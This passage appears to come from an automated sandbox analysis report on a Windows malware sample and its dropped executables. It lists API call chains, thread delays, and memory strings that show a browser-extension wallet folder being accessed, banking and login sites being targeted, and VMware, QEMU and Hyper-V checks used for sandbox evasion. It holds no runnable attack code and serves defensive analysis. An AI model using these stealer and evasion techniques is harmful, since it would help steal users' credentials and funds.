                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0433DC48 FindFirstFileExA,0_2_0433DC48
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,10_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,10_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,10_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,10_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,10_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,10_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,10_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_6C84261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C84261E
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00401120 GetSystemInfo,ExitProcess,10_2_00401120
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48200
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59875
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50296
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59765
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35164
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59654
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55558
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37152
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58292
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45531
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31846
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54766
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58932
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32840
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43927
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41217
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50336
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55596
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47999
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32154
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54204
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41688
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34406
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46910
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54138
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49263
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47819
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53139
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41283
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55223
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58364
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35062
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35354
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39543
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59740
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42710
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49005
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49630
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54950
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57170
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53064
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33684
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55206
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59888
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30041
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59776
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36977
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31976
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40701
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38418
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55104
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40213
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38396
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53243
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50534
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33839
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48486
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45158
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53153
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35968
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38866
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37341
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46137
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40346
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36239
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46406
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32599
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32410
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50326
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58298
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52363
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40697
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54691
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58288
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49715
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43198
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38231
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34826
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Datacenter without Hyper-V Core
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2683790959.000002567684F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: VMWARE_VIRTUAL
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Datacenter without Hyper-V Full
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Enterprise without Hyper-V Full
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Microsoft Hyper-V Server
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: QEMU_HARDU
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Standard without Hyper-V Full
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Enterprise without Hyper-V Core
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: u48o.1.exe, 0000000E.00000003.1724220970.0000000000974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: zLwT7vCojz.exe, 00000000.00000002.1558592354.0000000005EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: Standard without Hyper-V Core
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: u48o.0.exe, 0000000A.00000003.1360732339.000000002A7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-79973
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78930
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78927
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78948
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78980
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78941
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI call chain: ExitProcess graph end nodegraph_10-78956
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_0096D15B VirtualProtect ?,-00000001,00000104,?,?,?,0000000018_2_0096D15B
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00416240
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04333C4E mov eax, dword ptr fs:[00000030h]0_2_04333C4E
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_04320D90 mov eax, dword ptr fs:[00000030h]0_2_04320D90
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_0432092B mov eax, dword ptr fs:[00000030h]0_2_0432092B
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_043AD1AB push dword ptr fs:[00000030h]0_2_043AD1AB
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00415DC0 mov eax, dword ptr fs:[00000030h]10_2_00415DC0
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 13_2_0040F124 mov eax, dword ptr fs:[00000030h]13_2_0040F124
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00420C1A GetProcessHeap,0_2_00420C1A
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
